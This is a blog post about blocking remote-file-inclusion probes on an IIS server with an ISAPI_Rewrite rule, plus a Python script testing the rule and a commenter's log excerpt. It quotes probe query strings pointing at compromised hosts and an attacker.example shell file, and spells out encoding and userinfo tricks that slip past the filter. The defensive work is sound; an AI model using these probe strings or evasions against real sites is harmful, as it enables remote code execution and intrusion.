query hackers - htaccess - Helicon - ISAPI - rewrite - Google
For several weeks now, I've been detecting hack attempts that append a URL to my query strings. Instead of my actual query of 'Contact' or 'Item1' etc., I get someone's link to a site that they have already compromised. This is the classic remote-file-inclusion probe: the attacker is hoping the script will fetch and execute whatever that URL points to. Here are a few examples:
http://honamfishing.co.kr/phpmysqladmin/libraries/oduzov/nel...
http://sans-packing.ru/img/jipeqap/ehudute/
http://sahel55.com/articles/omaduro/kimumid/
http://www.psikolojikyardim.org/etkinlik/include/eto/nixaz/
http://www.pattibus.it/phplib-7.2b/pages/ilosi/dohigal/
I found a few suggestions on how to block these, but the best ones were all for Apache servers using .htaccess, and I'm using Microsoft Internet Information Services (IIS), which has no .htaccess. IIS uses ISAPI filters to work on incoming requests, and one of them, UrlScan, is customizable, so I tried blocking these types of queries with UrlScan, but that didn't work. (UrlScan 2.5 only matches its deny sequences against the request path; matching on the query string needs the DenyQueryStringSequences section that arrived with UrlScan 3.0.) Yesterday I found a solution that is working: I downloaded the free Lite version of ISAPI_Rewrite from Helicon Tech. Here's their short description of the software:
"ISAPI_Rewrite is an Apache mod_rewrite-compatible URL rewriter for Microsoft IIS server (please see the compatibility chart). It is used for search engine optimization, to proxy another server's content, to stop hotlinking or to strengthen server security. It supports distributed .htaccess configuration files, enhanced regular expressions and nearly all mod_rewrite features. And there is also a freeware Lite version of this product!"
This lets you set up rules that rewrite the HTTP request before it is passed on to the web server. Sounds simple enough, but I'd almost forgotten how tricky regular expressions can be. Blocking 'http:' in a query was easy; it took me a while to work out how to still let Google pass URLs for some gadgets that I host. While researching this I found a nice quote: "if the solution to a problem includes regular expressions then you've still got a problem". With that in mind, I thought I'd post my solution here. Two caveats first: both conditions are unanchored, case-insensitive substring searches on the raw (still percent-encoded) query string, and the 'google' exemption is a plain substring. So a query string that carries 'google' anywhere (an appended '&google', or a URL of the form http://www.google.com@some-other-host/) is waved through, while an innocent value that merely contains 'http' (such as 'httpd') is refused. The rule itself does no rewriting; it answers 403 Forbidden ([F]) and stops processing ([L]):
-----------------------------
RewriteEngine On
# block when the query string has at least one character followed by "http" (case-insensitive)...
RewriteCond %{QUERY_STRING} ^.+http [NC]
# ...unless "google" appears anywhere in it (the hosted Google gadgets pass URLs)
RewriteCond %{QUERY_STRING} !google [NC]
# "-" means no substitution; [F] answers 403 Forbidden, [L] stops rule processing
RewriteRule .* - [L,F]
------------------------------
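To see exactly what the two conditions accept and refuse, here is an added example (not code from this post or from Helicon) that re-implements them as Python regexes and runs them over sample query strings, beside a tighter, hypothetical rule that decodes each parameter value, looks for a URL scheme at the start of the value and allow-lists the hosts the gadgets may fetch from. The allow-listed hosts, the gadget URL and the attacker.example host are assumptions; two of the sample query strings are the ones a reader quotes from his log in the comments below.

```python
"""Offline model of the post's ISAPI_Rewrite rule, run over sample query strings.

Added example: this is not code from the post or from Helicon. It re-implements
the two RewriteCond lines as Python regexes so their behaviour can be checked,
and contrasts them with a tighter, hypothetical rule that decodes each value,
looks for a URL scheme at the start of the value, and allow-lists hosts.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# --- The post's rule -------------------------------------------------------
# RewriteCond %{QUERY_STRING} ^.+http [NC]   -> at least one char, then "http"
# RewriteCond %{QUERY_STRING} !google [NC]   -> unless "google" appears anywhere
# Both are unanchored substring searches on the *raw* (still percent-encoded)
# query string, which is what the Apache-style %{QUERY_STRING} variable holds.
COND_HTTP = re.compile(r"^.+http", re.IGNORECASE)
COND_GOOGLE = re.compile(r"google", re.IGNORECASE)


def post_rule_blocks(query_string: str) -> bool:
    """True when the post's rule would answer 403 Forbidden (the [F] flag)."""
    return bool(COND_HTTP.search(query_string)) and not COND_GOOGLE.search(query_string)


# --- A tighter variant (hypothetical) ---------------------------------------
# Assumption: the hosted gadgets only ever pass URLs under these hosts.
ALLOWED_URL_HOSTS = frozenset({"www.google.com", "gmodules.com"})
SCHEME_AT_VALUE_START = re.compile(r"^(?:https?|ftp|php|data)://", re.IGNORECASE)


def fully_decoded(value: str, passes: int = 3) -> str:
    """Undo up to `passes` layers of percent-encoding; double encoding is a common evasion."""
    for _ in range(passes):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def hardened_rule_blocks(query_string: str) -> bool:
    """True when any parameter value is an absolute URL whose host is not allow-listed."""
    for _name, value in parse_qsl(query_string, keep_blank_values=True):
        value = fully_decoded(value).strip()
        if not SCHEME_AT_VALUE_START.match(value):
            continue  # plain text such as "httpd config" is not a URL
        host = (urlsplit(value).hostname or "").lower()  # hostname drops any user@ prefix
        if host not in ALLOWED_URL_HOSTS:
            return True
    return False


# Sample query strings. The first two are the ones a reader quotes from his log
# in the comments on this page; the rest are constructed for the example.
SAMPLE_QUERIES = [
    "target=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Fgodot%2Folule%2F",
    "target=http%3A%2F%2Fstoneproperties.co.uk%2Falbum%2Fincludes%2Fnohul%2Fzojaz%2F",
    "Contact",                                                     # normal page query
    "url=http://www.google.com/ig/modules/example.xml",           # gadget fetch (hypothetical)
    "q=httpd%20config",                                            # innocent, contains "http"
    "target=http%3A%2F%2Fattacker.example%2Fshell.txt%3F&google",  # "google" anywhere
    "target=%68ttp%3A%2F%2Fattacker.example%2Fshell.txt",          # encoded "h" hides "http"
    "url=http://www.google.com@attacker.example/x",                # userinfo trick
]


def compare(queries=SAMPLE_QUERIES):
    """Return {query: (blocked by the post's rule, blocked by the hardened rule)}."""
    return {q: (post_rule_blocks(q), hardened_rule_blocks(q)) for q in queries}


if __name__ == "__main__":
    for query, (old, new) in compare().items():
        print(f"post={old!s:5} hardened={new!s:5}  {query}")
```

Running it shows the post's rule catching the two real probes but also refusing 'q=httpd config', and letting through the three evasions (an appended '&google', a percent-encoded 'h', and a www.google.com@ userinfo prefix), all of which the value-based check refuses while still allowing the gadget URL. In rule form the scheme-at-value-start check is roughly `RewriteCond %{QUERY_STRING} (^|&)[^=&]*=(https?|ftp)(://|%3a%2f%2f) [NC]` with the exemption tied to the value rather than the whole string, but since %{QUERY_STRING} is matched undecoded, any encoded spellings have to be listed in the pattern explicitly.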
Posted by John at 10:34:22 AM in Web Development (13)
Comments
1. gbuisman said...
I'm just looking through some log files and found this among a few others:
Fri 06 June 2008; 14.37 /stories.php?target=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Fgodot%2Folule%2F
Fri 06 June 2008; 14.37 /stories.php?target=http%3A%2F%2Fstoneproperties.co.uk%2Falbum%2Fincludes%2Fnohul%2Fzojaz%2F
Fri 06 June 2008; 14.37 /stories.php?target=http%3A%2F%2Fwww.service-exposants.com%2Fstore%2Fiyi%2Fzobakiq%2F
The hacker's address seems to be 85.88.11.140 (address: justgo.rohwerder-hinz.net). I just ran into the problem, and you seem to have some good information, so I think you might be interested. It seems the target sites are using php3. I wonder if they can get any 'lethal' information on me this way; I don't think so, as I wrote all the underlying code myself.